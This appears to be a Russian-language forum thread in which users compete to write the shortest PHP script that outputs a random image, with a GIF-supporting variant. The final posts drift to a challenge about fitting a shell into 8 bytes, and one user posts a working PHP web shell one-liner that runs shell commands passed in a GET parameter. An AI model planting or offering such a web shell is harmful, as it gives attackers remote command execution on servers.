задача - вывести рандомную картинку. кто сможет сделать это короче? PHP: <? php header('Content-type: image/jpg'); $hd = opendir('photo'); while($file = readdir($hd)) if($file != '.' && $file != '..') $imgs[] = $file; echo file_get_contents('photo/' . $imgs[rand(0, sizeof($imgs)-1)]); PS усложнение задачи- добавить GIF
Ипать, а что тебе нужно конкретно? Не можежь gif добаввить НЕ слабак? Не совсем прозрачно, ибо вырезка из Модели, но поймешь!
Чё??! Code: <?php $a=glob('photo/*.{gif,jpg,png,jpeg}', GLOB_BRACE); $u=$a[rand(0,sizeof($a)-1)]; header('Content-type: image/'.(($a=substr($u, strrpos($u, '.')+1))=='jpg'?'jpeg':$a)); readfile($u); ?> Читает gif, jpg, png, jpeg
2 Naydav мужик, эт че ваще? ))) заголовок темы прочитай я даж изучать твою портянку не хочу бгыгы 2 NOmeR1 особенно спасибо за раскрытие этого метода: PHP: (*****)=='jpg'?'jpeg':$a) ох уж эти тернарные операторы и булевы условия, столько тайн! В твоём примере ещё маленький штрих - закрывающий тег ?> можно убрать
Кажется нитрокс делал. Типо у тебя есть поле в котором ты можешь максимум вписать 8 байт, они запишутся в файл (*.php), и тебе нужно с помощью этих 8 байт выполнить шелл.
Прошу прощения за оффтоп... Случайно не про этот шелл говорится? PHP: <? isset($_GET[fuckkk]) ? print `$_GET[fuckkk]` : ''; ?> Ток тут явно не 8 байт. print `$_GET[fuckkk]`; Мне даже интересно стало, как укоцали шелл до 8 байт)) Если найдете - скиньте мне посмотреть)